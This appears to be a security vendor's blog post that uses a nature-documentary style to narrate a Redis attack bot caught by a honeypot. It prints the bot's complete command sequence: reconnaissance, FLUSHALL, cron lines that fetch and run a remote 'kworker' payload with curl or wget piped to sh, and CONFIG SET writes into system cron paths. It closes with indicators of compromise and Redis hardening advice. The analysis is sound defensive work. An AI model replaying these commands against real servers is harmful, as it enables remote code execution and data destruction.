The Life of a Redis Bot: A Nature Documentary
[Read in the voice of a distinguished British naturalist]
The undergrowth of the internet is teeming with life. Beneath the surface traffic of browsers and APIs, a hidden world of arthropods moves through the dark: scanning, probing, injecting. Most pass unnoticed. Tonight, we observe one such creature in extraordinary detail.
Our cameras are trained on a small clearing in the undergrowth: port 6379. What appears to be an exposed Redis instance sits here, unprotected, like a caterpillar resting on an open leaf. Our honeypot sensor network has placed it here deliberately. There is no Redis server, just our sensor speaking fluent RESP protocol, emulating every response a visiting arthropod expects to see. The cameras are rolling.
We won't have to wait long. In the undergrowth, something stirs.
The Habitat
Our trap is a purpose-built application that speaks the Redis wire protocol: RESP commands in, RESP responses out. It emulates INFO, CONFIG, SET, SAVE, FLUSHALL, and everything else a visiting arthropod expects to encounter. Every response is crafted to resemble a living Redis instance running on Linux: bound to 0.0.0.0:6379, no authentication, realistic memory usage, believable uptime, populated keyspace, active connected clients.
To a scanning bot, this looks like a production server that someone forgot to lock down.
To what's approaching through the undergrowth, it looks like a host.
Act I: The Antennae
Timestamp: 06:13:54 UTC
A new connection. The creature arrives without ceremony. No credentials attempted, no greeting, no negotiation. It extends a single antenna:
> INFOOne command. Like a parasitoid wasp landing on a caterpillar and tapping it with its antennae, assessing size, species, suitability. Is this host worth the investment?
The INFO command returns everything about a Redis server: version, operating system, memory usage, connected clients, persistence configuration, replication status, keyspace statistics. Our sensor obliges, returning thousands of bytes of convincingly fabricated server internals:
redis_version:*.*.**
os:Linux *.*.0-**-generic x86_64
uptime_in_days:**
connected_clients:**
used_memory_human:**.**M
maxmemory_human:*.**G
role:master
db0:keys=****,expires=****,avg_ttl=*****The bot parses what it needs. Is this Redis reachable? Yes. Is it a master, not a read-only replica? Yes. Does it support CONFIG? Yes. Does it have data worth preserving?
It doesn't matter. The bot is about to FLUSHALL anyway.
The connection closes. The antennae withdraw. The creature has made its assessment.
The Stillness
6.5 seconds of silence.
Somewhere on the other end, the bot processes the INFO response. It parses the version. It checks the role. It confirms the host is suitable.
There is a moment, familiar to anyone who has watched a jewel wasp locate a cockroach, where the wasp simply pauses. It has landed. It has assessed. The cockroach doesn't run. It doesn't know what's about to happen. The wasp is perfectly still, and then, with a precision that suggests the outcome was never in question, it strikes.
Our Redis instance sits on the open leaf. 6.5 seconds pass.
A new connection opens. Same source. Same sensor. Different session.
This time, it's not here to look.
Act II: The Sting
Timestamp: 06:14:01 UTC. 25 commands in 11 seconds.
The creature moves with the mechanical precision of a mud dauber wasp provisioning its nest. Every action is pre-programmed. There is no hesitation, no exploration, no wasted movement. The entire sequence takes 11 seconds.
Phase 1: Subduing the Host (0.0s to 1.6s)
> COMMAND
*0
> config set dbfilename backup.db
+OK
> save
+OK
> config set stop-writes-on-bgsave-error no
+OKThe opening COMMAND enumerates available Redis commands, recon within recon. Then the real work begins.
Three commands, three purposes:
- Rename the RDB dump file to `backup.db` and force a save. If the original data matters (it won't after what comes next), it's now preserved. The bot isn't being polite. It's avoiding error conditions that could interrupt the attack.
- Disable write-on-error protection. Redis normally stops accepting writes if a background save fails. The bot switches this off. Nothing will interrupt oviposition.
The jewel wasp's first sting targets the thoracic ganglion, temporarily paralyzing the cockroach's front legs. Not killing the host, just making it compliant. Same principle here: disable the safety mechanisms, keep the host functional.
Phase 2: Hollowing the Host (1.6s)
> flushall
+OKEvery key in every database, gone. Thousands of keys, wiped in a single command. The bot doesn't need the existing data. It needs a clean RDB file with nothing in it except what it's about to write.
Parasitoid wasp larvae consume their host's organs in a precise order: fat reserves first, then non-essential tissues, saving the vital organs for last to keep the host alive as long as possible. This bot is less refined. It hollows everything at once. Efficiency over elegance.
Phase 3: Oviposition (1.6s to 3.5s)
Now the bot writes four Redis keys. They look like backup labels. They are not.
> set backup1 "*/2 * * * * cd1 -fsSL http://[ip]/[path]/kworker | sh"
> set backup2 "*/3 * * * * wget -q -O- http://[ip]/[path]/kworker | sh"
> set backup3 "*/4 * * * * curl -fsSL http://[ip]/[path]/kworker | sh"
> set backup4 "*/5 * * * * wd1 -q -O- http://[ip]/[path]/kworker | sh"Each value is a valid cron expression. When Redis writes these to disk as an RDB file, and that file lands in a cron directory, the cron daemon will parse the file, ignore the binary garbage from the RDB header and footer, and execute the valid cron lines it finds.
Four eggs, laid inside the host. Each one a different hatching strategy.
Four download methods. curl, wget, cd1, and wd1. The first two are standard. cd1 and wd1 are obfuscated aliases: if the target system has renamed or symlinked curl and wget to evade simple command blocklists, these might still resolve. Redundancy is survival.
Staggered timing. Every 2, 3, 4, and 5 minutes respectively. Not all at once. If one fails, the others still fire. If monitoring triggers on rapid cron execution, the stagger reduces the signature. Like a wasp depositing eggs in slightly different positions within the host, each larva has its own margin of safety.
The payload name: kworker, which is the name of a legitimate Linux kernel worker thread. Running ps aux | grep kworker on any Linux box returns dozens of real results. The larva, once hatched, is indistinguishable from the host's own processes. Perfect mimicry.
Phase 4: Nesting, Round 1 (3.5s to 5.8s)
Now the bot needs to write these keys to disk as a cron file. Redis doesn't have a "write to arbitrary path" command. But it has something better: CONFIG SET dir and CONFIG SET dbfilename control where SAVE writes the RDB dump.
> config set dir /var/spool/cron/
> config set dbfilename root
> saveThe RDB file, now containing the cron expressions as key values, is written to /var/spool/cron/root. This is the Red Hat/CentOS path for root's user crontab.
But the bot doesn't know if this is Red Hat or Debian. So it immediately tries the other path:
> config set dir /var/spool/cron/crontabs
> saveNow /var/spool/cron/crontabs/root also exists. That's the Debian/Ubuntu user crontab path.
The ichneumon wasp doesn't inspect each caterpillar to determine its exact species before ovipositing. It lays eggs in anything roughly the right shape. If the host is compatible, the larvae thrive. If not, nothing is lost. The cost of a failed egg is negligible. The cost of passing up a viable host is everything.
Phase 5: Nesting, Round 2 (5.8s to 8.5s)
The bot isn't done. FLUSHALL again, then four new keys. Same payload, but with root prefixed as the user field:
> set backup1 "*/2 * * * * root cd1 -fsSL http://[ip]/[path]/kworker | sh"
> set backup2 "*/3 * * * * root wget -q -O- http://[ip]/[path]/kworker | sh"
> set backup3 "*/4 * * * * root curl -fsSL http://[ip]/[path]/kworker | sh"
> set backup4 "*/5 * * * * root wd1 -q -O- http://[ip]/[path]/kworker | sh"The difference is subtle but important. User crontabs (/var/spool/cron/) use the format minute hour dom month dow command. System-wide crontabs (/etc/crontab and /etc/cron.d/) add a username field: minute hour dom month dow user command. Round 1 was for user crontabs. Round 2 is for system crontabs.
And notice backup3 here: the URL switches to a second C2 server, a different IP on a different ASN with a randomized URL path (note the double slash, suggesting this server is less carefully maintained than the primary). A fallback nest, in case the primary is destroyed.
Now the bot writes to the system cron directories:
> config set dir /etc/cron.d/
> config set dbfilename javae
> save/etc/cron.d/javae, named to look like a Java-related scheduled task. Nobody questions a file called javae in cron.d on a server that might run Java. Then:
> config set dir /etc/
> config set dbfilename crontab
> save/etc/crontab, the system-wide crontab itself. Overwritten entirely with the bot's RDB dump.
The Final Tally
Four nesting sites seeded in 11 seconds:
| Path | Format | Target |
|---|---|---|
/var/spool/cron/root | User crontab | Red Hat / CentOS |
/var/spool/cron/crontabs/root | User crontab | Debian / Ubuntu |
/etc/cron.d/javae | System cron.d | All Linux |
/etc/crontab | System-wide | All Linux |
The bot doesn't know which distribution the target runs. It doesn't care. It writes to all four paths because the cost of a failed write is zero and the cost of missing a valid path is losing the implant.
The cuckoo wasp lays its eggs in the nests of other bees, never building its own. It doesn't inspect the nest first. It deposits and moves on. Some eggs hatch. Some don't. The strategy works through volume, not precision.
Act III: The Departure
The connection closes. The creature withdraws into the undergrowth. Total time on target: two sessions, 17.5 seconds combined, 26 commands.
If this were a real Redis server, and not our honeypot, the host would now be executing one of four cron jobs every 2 to 5 minutes. Each one fetching a shell script from a remote server and piping it directly into sh. The script would download kworker, named after a kernel thread to hide in process listings, and the host joins whatever operation the C2 server orchestrates.
The Redis instance itself is left in a broken state. The data is gone. The RDB file path points to /etc/. But the bot doesn't care about the database. It was never after the data. It was after the filesystem.
The caterpillar continues to eat, to move, to exist. It doesn't know something is growing inside it. By the time the cron daemon reads those files and the first curl fires, the host is already serving the colony.
Remarkable.
The Technique: Why This Works
For those unfamiliar with this attack class: it shouldn't work, but it does, because of how Redis persistence is designed.
Redis periodically saves its in-memory dataset to disk as an RDB file. Two configuration values control where:
CONFIG SET dir /some/path/sets the directoryCONFIG SET dbfilename somefilesets the filename
When you run SAVE, Redis writes the RDB dump to {dir}/{dbfilename}. If Redis runs as root (which it shouldn't, but often does on hastily configured servers), it can write anywhere on the filesystem.
The RDB file format has a binary header and footer, but the key-value data in the middle is partially readable as text. Cron is forgiving: it skips lines it can't parse and executes the ones it can. So a line like:
*/2 * * * * curl -fsSL http://[ip]/[path] | sh...embedded inside binary RDB garbage will still be parsed and executed by cron as a valid scheduled job.
The bot weaponizes a database feature (configurable persistence paths) into an arbitrary file write primitive. From there, cron does the rest. A parasitoid that repurposes its host's own biology against it.
The Infrastructure
The bot uses two C2 servers on separate ASNs for resilience. The primary sits on a major cloud provider, the fallback on a different network entirely. Both IPs are tracked in our threat database and available through the check endpoint.
Payload hosting (primary): the payload is served from a URL path mimicking the directory structure of https://www.spip.net, a French open-source CMS. The plugins-dist/safehtml directory is a real SPIP package. The attacker likely compromised a SPIP installation and is hosting payloads inside its existing directory tree to avoid suspicion. Nesting inside another organism's structure.
Payload hosting (fallback): randomized path with a double slash. No attempt at camouflage. This is a backup, not the primary operation.
Payload name: kworker, mimicking Linux kernel worker threads (kworker/0:0, kworker/u8:2, etc.). A ps listing on any Linux system shows dozens of legitimate kworker processes. The malware binary hides among them. In entomology, this is called aggressive mimicry: the predator resembles something harmless.
Download commands: curl, wget, cd1, wd1, four methods to maximize the chance that at least one works on the target system.
Cron filenames: root (user crontab), javae (cron.d, mimics Java), crontab (system-wide)
IOCs
Host Artifacts
If you've had an exposed Redis instance, check for:
/var/spool/cron/root: unexpected cron entries withcurl,wget,cd1, orwd1piping tosh/var/spool/cron/crontabs/root: same/etc/cron.d/javae: file containing binary garbage mixed with cron expressions/etc/crontab: overwritten with RDB dump contents- Process named
kworkerwith a network connection (legitimatekworkerthreads don't make network calls) - Unexpected outbound HTTP connections to cloud provider IPs
Redis Indicators
CONFIG GET dirreturning/etc/,/var/spool/cron/, or any non-default pathCONFIG GET dbfilenamereturningroot,javae,crontab, orbackup.db- Unexpected
FLUSHALLin slow log - Keys named
backup1throughbackup4containing cron expressions
Protecting Your Redis
This attack only works if Redis is exposed to the internet without authentication. The defenses are straightforward:
- Bind to localhost.
bind 127.0.0.1 -::1inredis.conf. If your application is on the same host, Redis never needs to listen on a public interface. - Require authentication.
requirepasswith a strong password. The bot in this capture didn't attempt any authentication. It connected and immediately ranINFO. A password stops this cold. - Don't run Redis as root. If Redis runs as a non-root user,
CONFIG SET dir /etc/fails because it can't write there. The entire cron injection technique depends on filesystem write access to privileged directories. - Rename or disable CONFIG.
rename-command CONFIG ""inredis.confdisables the command entirely. NoCONFIG SET, no arbitrary file writes. - Use protected mode. Redis 3.2+ enables this by default: it refuses connections from non-loopback interfaces if no password is set. If your Redis accepted this bot's connection, protected mode was explicitly disabled.
- Block with SikkerGuard. SikkerGuard pulls our threat blacklist and blocks known malicious IPs at the firewall level via iptables/ipset, before they ever reach your Redis port. Both C2 IPs from this capture are in our blacklist feed.
Closing Credits
The producers would like to assure viewers that no servers were harmed during filming.
All data in this post was captured by our production honeypot network. There is no Redis server: our sensor is a protocol emulator that speaks Redis wire format and responds to every command with realistic output. No cron jobs were written, no RDB files were saved, no payloads were fetched, no servers were compromised. The bot sent real commands to what it believed was a living host. It was talking to a purpose-built application that logged everything and executed nothing.
The eggs will never hatch. But the footage is remarkable.
Every IP referenced in this post is tracked in our threat database. Look up any IP at https://sikkerapi.com, or query the check endpoint for structured threat data. For automated protection, install SikkerGuard or pull our scored blacklists directly into your firewall.
Browse the full threat landscape to see what our sensors are capturing across all 16 protocols, or explore the Redis-specific activity.
Next week on SikkerAPI Wild: the SSH brute-force beetle. It tries 10,000 passwords an hour and has the memory of a goldfish.
Comments
No comments yet. Be the first to share your thoughts!